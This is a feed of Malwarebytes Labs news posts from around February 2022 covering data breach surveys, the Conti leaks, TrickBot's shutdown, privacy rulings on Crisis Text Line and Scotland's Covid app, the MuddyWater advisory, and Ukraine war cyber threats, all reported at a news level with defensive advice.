IT NEWS

Data breaches are one of the most reported cyberattacks against businesses—regardless of size and industry. And while this has highlighted cybersecurity gaps on so many fronts, some companies are still not prioritizing them as they should. Some have scrambled to be compliant but then find themselves successfully breached weeks or months after getting certified.

Unsurprisingly, many current and potential customers respond negatively to companies that have been breached. This is evident in the global consumer survey conducted by software company, Axway.

For many, a breach is treated as proof that companies are not doing what they’re supposed to with their data, and that is to primarily secure it at all cost, especially when businesses are placed high on their attack list. Companies saying that they take the security of their customers “very seriously” looks more like lip service than genuine concern over data security.

According to the survey, respondents are more comfortable with businesses in the financial (65 percent) and health (50 percent) sectors to protect their data. On the flip side, they are less confident entrusting their data to insurance companies (31 percent), retailers (26 percent), and educational institutions (31 percent).

When asked, “Would an online retailer’s lack of security for your private data prevent you from making a purchase through their website?”, 68 percent gave a resounding YES. This number is even higher—75 percent—when asked if they’d stop doing business with a company that has fallen victim to a breach or cyberattack that potentially compromised data. For companies with a history of cyberattacks or data breaches, 50 percent say they would not do any business with them.

While the numbers are stark and telling for any organization, only 12 percent of respondents said they would never engage with companies with such a history. It’s not completely bleak for breached companies though. It seems most survey takers—81 percent—would continue to use the brand provided that (a) the company has already addressed the issue that resulted in the breach or (b) consumers have done something on their end to help mitigate the problem, such as changing their login credentials.

“Security breaches and privacy concerns are another snag in the fabric that harms the frictionless experience people have come to expect,” said Brian Pagano, chief catalyst and VP at Axway, “In an increasingly connected world, we will continue to hear about security leaks. You can establish trust by giving consumers peace of mind about the back-end complexity thanks to secure solutions. And then, you can focus on the job of providing those brilliant new customer experiences.”

The post Data breaches leave customers very shaky, report says appeared first on Malwarebytes Labs.

On February 27, an individual with insights into the Conti ransomware group started leaking a treasure trove of data beginning with internal chat messages. Conti is responsible for a number of high profile attacks, including one against the Irish Healthcare system which has cost more than $48 million and more importantly has had an unprecedented human impact.

Only shortly before, the Conti gang had announced its support for the Russian government despite international outrage for the invasion and war on Ukraine. We believe this triggered a strong emotional reaction from either a threat actor or someone with unique access to Conti’s infrastructure.

The Twitter handle @ContiLeaks has been posting extremely valuable data about Conti and its members. The tweets include screenshots, raw data files and even the ransomware source code. In between data dumps the actor — who is likely a Ukrainian national — is seen expressing his disgust and anger.

Due to the sheer volume of data and the fact that a large portion of chats are in Russian, it will take some time to process and analyze. What we know already is that there is extremely valuable information about the Conti ransomware group, in particular about how they work as an organization and how they target their victims.

While Conti is quite resourceful and will probably rebound, there is no doubt that these leaks will cost them a great deal of money and possibly instill fear about their identification as individuals.

The Malwarebytes Threat Intelligence team continues to track and analyze this data dump as well as other cyber threats related to the war in Ukraine. Any intelligence that is collected is passed on and used to protect our customers.

Indicators of Compromise

The post The Conti ransomware leaks appeared first on Malwarebytes Labs.

The king of tricks is dead. Long live the new king. Or will it make a comeback?

While we already assumed TrickBot was dead in the water, the shutdown of the server infrastructure on February 24, 2022, did not go unnoticed. Is this really the end of one of the most active botnets in the last decade?

History

The rise of TrickBot started when it was a banking Trojan designed to steal personal financial data. Initial development started in 2016, with many of its original features inspired by Dyreza which was another banking Trojan.

Fast forward a few years to 2018, and due to its modular build and the capabilities to move laterally in a network TrickBot has become the top-ranked threat for businesses. Back then, the authors of TrickBot were agile and creative, regularly developing and rolling out new features. The separate modules made it easier to develop new capabilities and use the malware for several purposes. For example, in 2019 researchers found a new feature in TrickBot that allows it to tamper with the web sessions of users who were on certain mobile carriers. Other features such as disabling real-time monitoring from Windows Defender were also added at some point.

In 2021, a number of arrests were made that provided some insight into the scale and complexity of the TrickBot group. These arrests also seem to have been some of the starting points that marked the end of the group. Some might have felt insecure, even with all the safety guards they deployed to keep their true identity secret, seeing some of their co-workers getting indicted.

Cooperation

The ransomware scene can be compared to any legitimate business vertical in more than one way. You will see short lived cooperation, fusions, and staff moving from one company to another. Some of the malware peddlers and ransomware gangs have established a relationship that can be described as being in league with each other. Given their nature and the amount of money that goes around in these ransomware groups, they are sometimes referred to as (cyber)crime syndicates.

Over the years we’ve seen several campaigns where Emotet acted as a dropper for the TrickBot trojan. TrickBot then stole the financial information it was after, and downloaded the Ryuk ransomware. This Emotet-TrickBot-Ryuk supply chain was feared worldwide and turned out to be extremely resilient. After Ryuk’s rebranding to Conti this did not change. But Conti has grown over the years and expanded to the point that it can now be considered one of the major players in this ”industry” in its own right.

Its relationship with TrickBot was one of the primary reasons for the rapid rise of Conti. At some point, Conti turned into the sole end-user of TrickBot’s botnet product. By the end of 2021, Conti had essentially acquired TrickBot, with multiple elite developers and managers making the move to join Conti.

The end(?)

There are a few contributing factors that indicate that this may really be the end of TrickBot.

• The move of developers and managers to Conti, and possibly other gangs.
• The high detection rate for TrickBot. A less actively developed malware becomes an easy target for detection and remediation routines.
• The rise of the BazarLoader which used to be a part of Trickbot’s toolkit, but has now been developed into a fully autonomous tool. It seems the likely candidate for Conti to develop further.
• The voluntary shutdown of the servers and the fact that they hadn’t set up any new servers for months.
• The lack of new TrickBot email spam campaigns in the year 2022.

Renowned researchers expect this to be the end of TrickBot as we know it.

That doesn’t mean it can’t rise like a Phoenix from the flames with a new label or under different management. Most of the people who have led and developed TrickBot throughout its long run will not simply disappear from the scene, but find new employers, like Conti.

Whether we will notice that TrickBot is gone remains to be seen. Plenty of new infiltration methods are available to the ransomware gangs and their affiliates. And it will probably even take years before we stop seeing TrickBot detections, dormant or not, on some system.

The post TrickBot takes down server infrastructure after months of inactivity appeared first on Malwarebytes Labs.

Last month, Politico reported that Crisis Text Line, a national mental health support nonprofit whose volunteers help people through text-based chats, was sharing those chats with a for-profit company that Crisis Text Line spun-off in an attempt to boost funding for itself. That for-profit venture, called Loris.AI, received “anonymized” conversational data from Crisis Text Line, which Loris.AI would use to hone its product—a customer support tool.

The thinking behind this application of data went a little something like this: Companies all over the world have trouble dealing with difficult customer support conversations. Crisis Text Line had trained an entire volunteer force on having broadly difficult conversations. What if the lessons from those conversations could be gleaned from the data trails they left behind? What if the lessons could be taught to a product, which would in turn help customer support representatives deal with angry customers?

But that setup, once exposed by Politico, infuriated many members of the public. Some thought it was wrong to keep conversational data, period. Some thought it was wrong to allow outside researchers to study the data of texters and the volunteers who support them. And some were primarily upset with the application of this data to bolster a for-profit venture.

Today, to help us understand that anger and to dive into data privacy principles for crisis support services, we’re speaking with Courtney Brown, the former director of a suicide hotline network that was part of the broader National Suicide Prevention Lifeline.

Interestingly, during her time with her suicide hotline network, Brown consulted with Crisis Text Line on the evaluation of its volunteer training program in their first year.

For Brown, the problems with Crisis Text Line are clear: The use of the data was not proven to help anyone in any way that hadn’t already been discovered in prior suicide research.

“[Crisis Text Line is] acting like there is a social good, that there must be—there must be a social good somewhere in here. But seriously, what is it. Tell me what it is. Maybe I’ll reevaluate it if you can tell me how using this data is different from using all of the other data that’s been collected about suicide prevention.”

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post How Crisis Text Line crossed the line in the public’s mind: Lock and Code S03E05 appeared first on Malwarebytes Labs.

The UK’s data watchdog has issued a reprimand to both the Scottish government and NHS National Services Scotland about their Covid Status app. The Information Commissioner’s Office (ICO) urged both to act swiftly to address its concerns about the app that, according to the ICO, failed to provide people with clear details about how their personal information was being used.

Covid Status app

The NHS COVID Pass shows the holder’s Covid vaccination details, test results, and recovery information. The holder can use the app to prove their Covid status when travelling abroad or when visiting venues that require proof of a Covid status. The app can be used to display a QR code rather than details of the vaccination or test results, which can then be scanned by someone using a verifier app. They will need to see a green tick that confirms the person’s Covid status in order to allow them the requested access.

The displayed information is inherently personal because it says something about your medical history so it should be treated with the greatest care. However, the ICO said there were only three days between it receiving the full details on how the NHS Scotland Covid Status app would be using people’s information and the rollout of mandatory status checks. This did not provide authorities and users with ample time to review the privacy details.

Sharing information

Originally, there were plans to let the app share the images and passport details of Scottish users with the software company providing the facial recognition technology behind it, but this technology wasn’t necessary for the app to function and served no benefit to the user. The ICO concluded it would have been unlawful in these circumstances to share information with the software company in order to help them improve the facial recognition software.

As a result, the Scottish government and NHS National Services Scotland halted plans to share personal data with the software company. However, the ICO said the app was launched as planned without fully addressing its wider concerns about compliance with data protection law.

The investigation

The ICO followed up with an investigation and has now concluded that both parties failed to initially provide adequate information to users about how personal information would be used. They also didn’t correct this by failing to provide concise privacy information so the average person could realistically understand how the app was using their information. The ICO decided to make its ruling public due to the significant public interest in the issues raised.

The defense

Ministers accepted that the privacy information could have been clearer, but the Scottish government said the NHS Scotland Covid Status app was an important tool in their response to COVID-19, and served as a vital public health role during the pandemic. They went on to stress that at all times people’s data was held securely and used appropriately.

“Together with NHS National Services Scotland, we will continue to work with the ICO to implement the improvements they have asked for, and ensure that lessons are learned for future work.”

Other Covid apps

Given the limited timeframe to come up with an acceptable solution and the sensitive data held, it was almost inevitable there would be flaws in some of the apps that were designed for this purpose. The NHS Scotland Covid app was not alone.

Numerous tracing applications have been developed or proposed, with official government support in some territories and jurisdictions. These tracing apps are designed to notify users if they have been in close contact with a COVID-19 victim. Privacy concerns have been raised, especially about systems that are based on tracking the geographical location of app users.

The Dutch CoronaMelder-app got shut down for days because there were privacy issues with the Google layer of the app that potentially leaked data to standard apps on the Android platform. Later it was criticized again because public health service employees of the GGD would be able to link app data to a specific patient.

The Singapore TraceTogether-app, also a tracing app, was summoned to update its privacy conditions to reflect the fact that location data from the app could be used in criminal investigations.

In France, a researcher found that the contact tracer app collects more data than originally understood. His findings show that all cross-contacts are sent to the central server, contrary to the government guidance which states that only the app users who had been in contact for 15 minutes, closer than one meter away from a person who tested positive for COVID-19 would be stored, meaning that the app processes more data than necessary or specified, and is not compliant with the data minimization principle. The French Government has not denied the comments.

Stay safe, everyone!

The post Covid app’s privacy information ruled not clear enough appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• Potential cybersecurity impacts of Russia’s invasion of Ukraine
• Cyber lures and threats in the context of the war in Ukraine
• CISA warns of cyberespionage by Iranian APT “MuddyWater”
• Google and Microsoft accused of feeding smaller search engines spam ads
• Cyclops Blink malware: US and UK authorities issue alert
• Yik Yak “cyberbullying”: What can be done?
• How to update your drivers and when you need to
• Hive ransomware: Researchers figure out a method to decrypt files
• “Ethnicity recognition” tool listed on surveillance camera app store built by fridge-maker’s video analytics startup
• Xenomorph banking Trojan downloaded over 50,000 times from Play Store
• CISA offers guidance on dealing with information manipulation
• Facebook sued for siphoning facial recognition data without consent

Stay safe!

The post A week in security (February 21 – February 27) appeared first on Malwarebytes Labs.

Google and Microsoft appear to have been flooding their smaller search engine rivals with spam ads, to limit the number of higher-value ads that appear on them, according to data viewed by POLITICO.

Ads are considered “spam” if they appear in search results but have little to no relevance to the search terms a user has entered, and may direct users to less reputable sources. Such ads generate little value to search engines overall.

Pushing spammy ads to their smaller partners tilts the scales in favour of the bigger search engines in two ways. Firstly, it limits how much money smaller search engines can make, and gives Google and Microsoft a greater share of the more profitable ads. Secondly, users of alternative search engines like DuckDuckGo may be turned off by the poor ad choices when they search. This could encourage them to use Google and Bing instead, if they think those sites offer better and more reliable ads.

POLITICO reports that the findings come from data compiled by adtech researchers who wish to remain anonymous for fear of damaging their relationship with either Google or Bing.

Smaller search engines rely on the results of Google and Microsoft—so-called “gatekeeper search engines”—as they have the lion’s share of the search market. Google, of course, has by far the biggest share, with 90 percent, and up to 600 billion websites indexed. On the other hand, Bing has a 7 percent share but indexes more or less 150 billion web pages. POLITICO explains that these alternative search engines often have agreements with Google or Microsoft. This means that these two companies also supply the ads that appear on top of search result pages.

Readers may be surprised to discover that the privacy-focussed search engine DuckDuckGo uses Microsoft for its ads. According to DuckDuckGo “…your searches cannot be tied back to you”, however, that protection stops when you click on an ad: “When you leave our site, you are subject to other sites’ policies, including their data collection practices. For ads from Microsoft, you also pass through Microsoft Advertising’s platform.”

In its article, POLITCO compares the ads shown by DuckDuckGo and Bing for the search term “depression”, with DuckDuckGo showing obviously lower-quality ads. Search ads are subject to all kinds of factors so we thought we’d try it ourselves. We saw the same result.

According to Marc-André Rousseau, a lawyer at the German law firm Schalast, the findings are in parallel with the Google Shopping saga as Google, once again, has conducted self-preferencing practices.

A spokesperson from Google told POLITICO that all ads signed up to search engine partners can appear on both Google’s and partner’s search results; however, the company “has certain algorithms in place that put controls on the types of ads shown.”

On the other hand, alternative search engines have reacted differently to the findings. DuckDuckGo said that it’s “constantly working to improve the quality of its results.” Qwant, a search engine that relies on Microsoft’s indexes, has started to study the advertising area in more detail in recent months. Startpage, a privacy search engine like Qwant, admits to using Google Ad Network for its ads but argues that the low-quality ads result from less user tracking. POLITICO, however, dispels this as the same ads appear on new machines that never used Bing or Google when they conducted their experiment.

The post Google and Microsoft accused of feeding smaller search engines spam ads appeared first on Malwarebytes Labs.

Cybersecurity agencies in the US and UK have issued a joint cybersecurity advisory (CSA) on MuddyWater, a government-sponsored Iranian advanced persistent threat (APT) actor. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the US Cyber Command Cyber National Mission Force (CNMF), and the National Security Agency (NSA), together with the UK’s National Cyber Security Centre (NCSC), have detailed operations by this APT against a range of governments and private organizations around the world.

MuddyWater, also known as Earth Vetala, MERCURY, Seedworm, Static Kitten, and TEMP.Zargos, has its eyes set on the telecommunications, defense, local government, and oil and natural gas sectors—among others—in Africa, Asia, Europe, and North America.

“MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS),” the advisory briefs its readers. “This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.”

“MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions.”

The full advisory can be read in this CISA web page. It can also be downloaded as a PDF file.

The advisory lastly reminds readers to take mitigating steps to protect themselves from malicious MuddyWater campaigns. Ensure that software is patched, prioritizing applications and operating systems with known, exploitable vulnerabilities. Back it up with an effective antivirus solution, EDR and SIEM. Use multifactor authentication (MFA) wherever you can. Limit access to resources according to the principle of least privilege.

Lastly, ensure that emplyees are trained to be alert for suspicious emails or social media posts—they could be the start of a phishing attack.

The post CISA warns of cyberespionage by Iranian APT “MuddyWater” appeared first on Malwarebytes Labs.

The conflict between Ukraine and Russia goes a long way back, but it took a dramatic turn after the 2014 Ukrainian revolution. Since then, the war in the Donbas region has resulted in a number of casualties as well as a constant feeling of insecurity among the population.

In recent months, Russia increased its pressure on Ukraine by placing more and more troops along its Eastern border. At the same time, a number of destructive cyber attacks against government websites and other organizations took place.

On February 24, Russia invaded Ukraine and started a full military conflict across that nation. While the kinetic war is by far the most pressing issue, cyber threats against Ukraine and Western countries are increasing as well.

In this blog, we will review some of the threats that have primarily targeted Ukraine but could also spill over globally.

Constant APT attacks

The Russian APT group Gamaredon has been actively targeting Ukraine for a number of years. However in recent months the interest has reached a new level and this was observed in campaigns using a number of lures. We caught one such sample recently that displays a decoy PDF of 40 pages supposedly detailing Russian military training:

Наставление по физической подготовке в Вооруженных Силах Российской Федерации разработано для командиров (начальников) всех степеней, специалистов физической подготовки, содержит указания и требования по вопросам физической подготовки личного состава. 

The Manual on Physical Training in the Armed Forces of the Russian Federation is designed for commanders (chiefs) of all degrees, specialists in physical training, contains instructions and requirements for physical training of personnel.

The malicious archive not only contains a decoy, but also a VNC server that allows the attacker to gain access to the victim’s computer. The command and control server (licensecheckout[.]com) is hosted on 45.139.186[.]190 (Russia).

Destructive malware

In January, a new destructive malware dubbed WhisperGate was unleashed against Ukrainian targets. It was followed in February by HermeticWiper, a piece of malware that is meant to render a machine unusable by corrupting the MBR partition.

Our Threat Intelligence team is currently analyzing this threat and will publish a technical report.

Retaliation threats

The infamous Conti ransomware group announced on February 25 that it will retaliate against any cyber (or physical) attack against Russia.

The Conti Team is officially announcing a full support of Russian government. If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use our all possible resources to strike back at the critical infrastructures of an enemy.

This was followed by another clarification:

If there ever was any doubt that some of the world’s most damaging ransomware groups were aligned with the Kremlin, this sort of allegiance will put an end to it.

Since several countries have announced severe economic sanctions against Russia, we should expect retaliation via cyber means. Russia will perceive those sanctions as a direct attack against its economy, and they know how to respond in kind, not with sanctions but with cyber intrusions on critical infrastructure.

Uncertain times

Organizations have already faced the global ransomware threat for a number of years, and in many ways the same security recommendations continue to apply. What might be different is the intensity of attacks as well as the sheer determination from the adversary. For this reason, we would recommend following best practices outlined by CISA and your country’s CERT.

More than ever, individuals and organizations should be extremely vigilant to phishing attempts and preemptively hunt for possible threats within their environment. Remember to not only deploy but also properly configure your endpoint detection and response (EDR) solution.

At Malwarebytes, we are tracking those cyber threats and ensuring that our customers continue to be protected. According to AV-Comparatives, Malwarebytes Consumer and Enterprise versions were able to protect the system effectively against multiple variants of the Hermetic Wiper malware.

The post Cyber lures and threats in the context of the war in Ukraine appeared first on Malwarebytes Labs.

On Thursday night, Russia launched a military invasion of its neighbor and former Soviet Union member Ukraine, drawing a broad rebuke from international leaders, along with significant protest from the Russian public.

The toll of human life from this war is unknown, and, like the many international acts of aggression that have preceded it, future figures and statistics will not, alone, make sense of it. The threats and dangers posed by this conflict will be borne by the combatants and the people of Ukraine, and they are in our thoughts. Our collective priority must be people’s physical safety, but Russia’s assault could also produce a range of cybersecurity-related risks that organizations and people will need to protect themselves against, starting today.

Here are some of the ways in which Russia’s invasion of Ukraine may impact cybersecurity, and what organizations can do to stay safe in a continually evolving crisis.

The risk of increased stakes

In tandem with the physical strikes against Ukraine, a piece of wiper malware first detected by researchers at Symantec and ESET had already begun targeting organizations in Ukraine. Analyzed by SentinelOne, this wiper malware has been given the name HermeticWiper and it differentiates itself from typical malware in one, important way: Those responsible for it aren’t looking for any payment—they just want to do damage.

(AV-Comparatives quickly tested several known anti-malware and antivirus products against HermeticWiper and its variants and found that Malwarebytes, among others, detected the malware.)

Current analyses of HermeticWiper reveal that the malware is being delivered in highly-targeted attacks in Ukraine, Latvia, and Lithuania. Its operators seem to leverage vulnerabilities in external-facing servers while utilizing compromised account credentials to gain access and spread the malware further.

These tactics are nothing new, and familiar cybersecurity best practices around privileged access hold true. But here, the stakes have changed. Even in the worst-case-scenario of any ransomware attack, there’s at least a promise (which could admittedly be false) of a decryption key that can be purchased for a price. With a wiper malware, there is no such opportunity.

As described by Brian Krebs on his blog:

“Having your organization’s computers and servers locked by ransomware may seem like a day at the park compared to getting hit with ‘wiper’ malware that simply overwrites or corrupts data on infected systems.”

The risk of collateral damage

Russia’s proclivity for cyber warfare is well recorded. In the past, the country has been credibly blamed or proven responsible for several cyberattacks against Ukraine and its surrounding neighbors, including DDoS attacks in Estonia in 2007, Georgia in 2008, and Kyrgyzstan in 2009. Russia is also believed to have been responsible for an email spam campaign against Georgia in 2008, and also for the delivery of the “Snake” malware against Ukraine’s government in 2014. And in 2015 and 2017, when Ukraine’s power grid suffered two separate shutdowns because of the malware variants BlackEnergy and Industroyer/CrashOverride, much of the evidence reportedly pointed back to Russia.

Though these attacks, like the current attacks involving HermeticWiper, were highly targeted, the idea of “tidy” cyber warfare is a farce.

In June 2017, Russia—as concluded by the CIA just months later—unleashed a cyberattack on Ukraine that spilled out into the world. The cyberattack involved a piece of malware reportedly developed by Russia’s military intelligence agency the GRU, called NotPetya. Though it presented itself as a common piece of ransomware, it actually worked more like a wiper, destroying the data of its victims, which included banks, energy firms, and government officials.

But the attack, which was reportedly carried out to harm Ukraine’s financial system, spread out, hitting networks in Denmark, India, and the United States.

It was at the time the most devastating cyberattack in history, costing the shipping company Maersk a reported $300 million, and the pharmaceutical giant Merck a reported $870 million.

Though it’s impossible to predict what type of collateral damage could occur, the US Cybersecurity and Infrastructure Security Agency has released a cybersecurity guide for all organizations in the US to follow during this turbulent time. You can read that guide, called Shields Up, here.

The risk of escalation

As Ukraine defends itself against Russian forces, world leaders are faced with a difficult decision. Should they deliver support to Ukraine in any material way, Russia may then retaliate against them with its own cyber-attacks, and these attacks are unlikely to be borne by world leaders. Instead, the “crossfire” between national cyber-fronts will likely inflict harm on everyday individuals and businesses.

Already, this decision has produced a wrinkle, as world leaders are not just defending themselves against Russia’s cyber-offensive regimes, but also against known ransomware gangs that have quickly sworn allegiance to Russia’s cause.

On February 25, the Conti ransomware group announced that it would retaliate against any known physical or cyberattacks against Russia. As we wrote on Malwarebytes Labs:

“Any doubt that some of the world’s most damaging ransomware groups were aligned with the Kremlin, this sort of allegiance will put an end to it.”

Despite a clarification about an hour later, which attempted to reframe the group’s “full support of Russian government” into “we do not ally with any government”, there can be no doubt about the threat the group poses.

Unfortunately, the risk of escalation seems likely, as countries ramp up economic sanctions against Russia, and as the US is walking a delicate balance about its own cyber initiatives. On February 24, multiple White House officials denied, as NBC News had earlier reported, that the Biden Administration was considering multiple “options” of cyber engagement “on a scale never before contemplated.”

According to White House Press Secretary Jen Psaki, who wrote on Twitter, NBC’s “report on cyber options being presented to @POTUS is off base and does not reflect what is actually being discussed in any shape or form.”

These denials, however, preceded a more recent statement made by President Joe Biden this week, in which he said that “If Russia pursues cyberattacks against our companies, our critical infrastructure, we’re prepared to respond. For months, we’ve been working closely with the private sector to harden our cyber defenses [and] sharpen our response to Russian cyberattacks.”

The risk of misinformation

Already, countless videos have begun circulating online that either make unproven claims or make claims that have specifically been debunked. Earlier today, a video that purports to show a Ukrainian fighter pilot shooting down Russian air forces in the sky was proven to be fake—a product of a simulation game called Digital Combat Simulator.

Though that video was developed as an “homage” to the so-called “Ghost of Kyiv,” social media companies have been combatting a Kremlin-backed disinformation campaign taking place on Twitter, Facebook, YouTube, and TikTok.

According to recent reporting from Politico:

“Russia-backed media reports falsely claiming that the Ukrainian government is conducting genocide of civilians ran unchecked and unchallenged on Twitter and on Facebook. Videos from the Russian government — including speeches from Vladimir Putin — on YouTube received dollars from Western advertisers. Unverified TikTok videos of alleged real-time battles were instead historical footage, including doctored conflict-zone images and sounds.”

Users should digest any viral videos and news with caution, particularly during this conflict, as the primary aggressor has a proven history with information warfare. It is also worth remembering that during wartime even reporting from reputable sources may be based on innaccurate, incomplete or out-of-date information.

The risk of scams

In 2020, as infections of COVID-19 dramatically increased to the point of officially creating a global pandemic, online scammers pounced, sending bogus emails asking for donations to fake charities and registering thousands of COVID-19-related domains to trick unwitting victims into swiping their money or their account credentials.

With Russia’s invasion of Ukraine, the same strategy will likely happen, as online scammers constantly seek the latest crisis to leverage for an attack.

When asked on Twitter for advice on which organizations to donate to in order to help Ukraine, the user @RegGBlinker said that, after she’d read through a list of such organizations, she found many that raised suspicions.

The same Twitter user has already compiled a thread that links to multiple other Twitter users who have personally offered their cybersecurity help to small-to-medium-sized businesses (SMBs) affected by the attacks in Ukraine.

At the same time, several companies and organizations have begun offering their own support. F-Secure, for example, is offering its VPN tool for free to anyone in Ukraine, and The Tor Project has released a support channel for Russian-speaking users who want help in setting up Tor.

The full thread on support can be found here.

For any other donation offers that users think might be a scam, trust the same rules that apply to phishing emails—are there any misspellings, grammar mistakes, unknown senders, or unknown charities involved in the request? Check yourself before handing over any money.

The risk of focusing too heavily on Ukraine

While Ukraine is in crisis, several online threat actors have continued their own assault campaigns.

On February 24, multiple outlets reported that a ransomware gang that the cybersecurity firm Mandiant tracks as “UNC2596” was exploiting vulnerabilities in Microsoft Exchange to deliver its preferred ransomware, colloquially dubbed “Cuba.” On the same day, the US Cybersecurity and Infrastructure Security Agency (CISA) announced that it had spotted “malicious cyber operations by Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater.” Those attacks were targeting both government and private-sector organizations in Asia, Africa, Europe, and North America.

An international human crisis is in no way a cause for inaction from online threat actors. Organizations should follow the same guidance they have before in protecting themselves from the most common online threats.

As CISA Director Jen Easterly warned on Twitter:

“Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners.”

The post Potential cybersecurity impacts of Russia’s invasion of Ukraine appeared first on Malwarebytes Labs.